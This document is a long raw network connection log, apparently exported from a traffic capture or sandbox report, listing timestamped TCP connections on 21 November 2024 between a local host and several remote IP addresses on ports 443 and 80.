                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.231081009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.234658003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.234730005 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.235457897 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.350342989 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.354798079 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.354830980 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.355405092 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.756721973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.756742001 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.756836891 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.759288073 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.776638985 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.776688099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.776710987 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.776782990 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.779434919 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.780735970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.878946066 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.898936033 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.900204897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.966536045 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.970336914 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.970921040 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.090502024 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.090894938 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.109839916 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.115948915 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.118227005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.118299007 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.118366957 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.121025085 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.121588945 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.244854927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.284723997 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.306780100 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.306799889 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.306950092 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.333240032 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.369229078 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.451833963 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.452831984 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.458625078 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.458710909 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.458729029 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.473594904 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.478322983 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.497672081 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.537734985 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.593405962 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.597933054 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.618575096 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.669116020 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.673976898 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.796596050 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.804156065 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.812870979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.823149920 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.823295116 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.823635101 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.825747967 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.832851887 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.832940102 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.833148003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.835447073 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.836227894 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.874097109 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.876696110 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:16.877969027 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.142803907 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.252460003 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.252532959 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.252614021 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.252624989 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.252722979 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253051043 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253062963 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253074884 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253130913 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253145933 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253149033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253181934 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253196955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.253226042 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.263933897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.276170015 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.276678085 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.277798891 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.339824915 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.344403028 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.365891933 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.369214058 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.397913933 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.398854017 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.399454117 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.460257053 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.463999033 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.613785028 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.617485046 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.617516041 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.617551088 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.628842115 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.629489899 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.631921053 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.676088095 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.676162004 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.748397112 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.749013901 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.751517057 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.824225903 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.941302061 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.962135077 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.967428923 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.967482090 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:17.967688084 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:18.042891979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:23.179905891 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:23.179949045 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:23.180078983 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:23.189588070 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:23.189609051 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.154809952 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.154901028 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.159883976 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.159898996 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.160264969 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.276432991 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.319334984 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878804922 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878873110 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878895044 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878916979 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878931046 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878958941 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.878979921 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.879017115 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.879017115 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.879038095 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.879075050 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.879101038 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899676085 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899699926 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899770021 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899882078 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899888039 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.899971962 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.900067091 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.900091887 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.900106907 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.900141001 CET49710443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:25.900146961 CET4434971052.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:49.918010950 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:49.918056011 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:49.918231010 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:50.008909941 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:50.008939981 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.396895885 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.397232056 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.448352098 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.448367119 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.448851109 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.450642109 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.453763962 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.499337912 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.956839085 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.956864119 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.956903934 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.956932068 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.956935883 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.957012892 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:51.957012892 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.035195112 CET49711443192.168.2.8149.154.167.99
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.035226107 CET44349711149.154.167.99192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.589090109 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.589129925 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.589287996 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.589572906 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.589587927 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:53.641757011 CET4970380192.168.2.8199.232.214.172
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:53.762048006 CET8049703199.232.214.172192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:53.762504101 CET4970380192.168.2.8199.232.214.172
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.475965023 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.476234913 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.480303049 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.480309963 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.480712891 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.481317997 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.481714010 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:54.527337074 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.186173916 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.186254978 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.186285973 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.186337948 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.189177990 CET49712443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.189198971 CET4434971249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.200558901 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.200596094 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.200710058 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.200968027 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:55.200983047 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.704787970 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.704844952 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.705286026 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.705291986 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.707217932 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:56.707223892 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.623631954 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.623718977 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.623756886 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.623831987 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.624001026 CET49713443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.624022961 CET4434971349.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.632692099 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.632731915 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.632811069 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.633142948 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:57.633161068 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.095571995 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.095678091 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.096164942 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.096174002 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.097887993 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:59.097893953 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013513088 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013528109 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013590097 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013653994 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013684988 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013881922 CET49714443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.013895035 CET4434971449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.020556927 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.020600080 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.020735979 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.021018028 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:00.021034002 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.478058100 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.478138924 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.478555918 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.478563070 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.480387926 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:01.480395079 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.356437922 CET49716443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.356504917 CET4434971652.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.356621027 CET49716443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.356997967 CET49716443192.168.2.852.149.20.212
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.357016087 CET4434971652.149.20.212192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.385780096 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.385807991 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.385842085 CET49715443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.385854959 CET4434971549.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:02.385869026 CET49715443192.168.2.849.13.32.95
